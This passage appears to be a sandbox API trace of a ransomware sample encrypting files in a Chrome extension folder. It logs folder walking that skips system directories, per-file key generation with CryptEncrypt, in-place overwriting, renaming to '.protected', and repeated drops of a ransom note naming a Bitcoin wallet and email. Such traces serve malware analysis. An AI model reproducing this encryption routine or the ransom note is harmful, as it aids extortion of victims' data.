dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.763] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.763] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.764] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.764] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.764] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.764] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.764] CloseHandle (hObject=0x164) returned 1 [0080.764] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.764] lstrcmpiW (lpString1="zu", lpString2="Windows") returned 1 [0080.764] lstrcmpiW (lpString1="zu", lpString2="Program Files") returned 1 [0080.764] lstrcmpiW (lpString1="zu", lpString2="Program Files (x86)") returned 1 [0080.764] lstrcmpiW (lpString1="zu", lpString2="$Recycle.bin") returned 1 [0080.764] lstrcmpiW (lpString1="zu", lpString2="System Volume Information") returned 1 [0080.764] wnsprintfW (in: 
pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu") returned 141 [0080.764] lstrcmpW (lpString1="zu", lpString2=".") returned 1 [0080.764] lstrcmpW (lpString1="zu", lpString2="..") returned 1 [0080.764] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\*") returned 143 [0080.764] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.764] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.764] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.764] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.764] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.764] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.764] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\.") returned 143 [0080.764] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.764] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.764] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.765] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.765] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.765] 
lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.765] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.765] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\..") returned 144 [0080.765] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.765] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.765] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.765] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.765] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.765] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.765] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.765] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.765] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json") returned 155 [0080.765] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.765] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.765] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.765] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.765] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json") returned 155 [0080.765] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.765] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json") returned 155 [0080.765] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.765] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json") returned 155 [0080.765] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.765] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xc2, lpOverlapped=0x0) returned 1 [0080.766] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff3e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.766] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xc2, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xc2, lpOverlapped=0x0) returned 1 [0080.766] SetFilePointerEx (in: hFile=0x168, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.766] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.766] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.766] CloseHandle (hObject=0x168) returned 1 [0080.767] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json.protected") returned 165 [0080.767] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json.protected")) returned 1 [0080.767] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.767] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.767] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\RESTORE_FILES.txt") returned 159 [0080.767] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.768] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.768] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.768] lstrlenA (lpString="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") returned 684 [0080.768] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.768] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.768] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.769] CloseHandle (hObject=0x164) returned 1 [0080.769] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0080.769] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0080.769] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\RESTORE_FILES.txt") returned 156 [0080.769] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0080.769] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.769] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0080.770] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.770] WriteFile (in: hFile=0x160, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0080.770] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.770] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0080.770] CloseHandle (hObject=0x160) returned 1 [0080.770] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0080.770] lstrcmpiW (lpString1="_metadata", lpString2="Windows") returned -1 [0080.770] lstrcmpiW (lpString1="_metadata", lpString2="Program Files") returned -1 [0080.770] lstrcmpiW (lpString1="_metadata", lpString2="Program Files (x86)") returned -1 [0080.770] lstrcmpiW (lpString1="_metadata", lpString2="$Recycle.bin") returned 1 [0080.770] lstrcmpiW (lpString1="_metadata", lpString2="System Volume Information") returned -1 [0080.770] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata") returned 139 [0080.770] lstrcmpW (lpString1="_metadata", lpString2=".") returned 1 [0080.770] lstrcmpW (lpString1="_metadata", lpString2="..") returned 1 [0080.770] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\*") returned 141 [0080.770] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0080.771] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.771] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.771] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.771] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.771] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.771] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\.") returned 141 [0080.771] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.771] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.771] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.771] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.771] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.771] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.771] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.771] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\..") returned 142 [0080.771] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.771] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.771] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.771] lstrcmpiW 
(lpString1="computed_hashes.json", lpString2="Windows") returned -1 [0080.771] lstrcmpiW (lpString1="computed_hashes.json", lpString2="Program Files") returned -1 [0080.771] lstrcmpiW (lpString1="computed_hashes.json", lpString2="Program Files (x86)") returned -1 [0080.771] lstrcmpiW (lpString1="computed_hashes.json", lpString2="$Recycle.bin") returned 1 [0080.771] lstrcmpiW (lpString1="computed_hashes.json", lpString2="System Volume Information") returned -1 [0080.771] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json") returned 160 [0080.771] StrStrIW (lpFirst="computed_hashes.json", lpSrch=".protected") returned 0x0 [0080.771] lstrcmpW (lpString1="computed_hashes.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.771] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0080.772] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0080.772] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.772] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json") returned 160 [0080.772] StrStrW (lpFirst="computed_hashes.json", lpSrch=".txt") returned 0x0 [0080.772] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json") returned 160 [0080.772] StrStrW (lpFirst="computed_hashes.json", lpSrch=".rar") returned 0x0 [0080.772] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_metadata\\computed_hashes.json") returned 160 [0080.772] StrStrW (lpFirst="computed_hashes.json", lpSrch=".zip") returned 0x0 [0080.772] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0xaf3, lpOverlapped=0x0) returned 1 [0080.773] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xfffff50d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.773] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0xaf3, lpNumberOfBytesWritten=0x295db84, 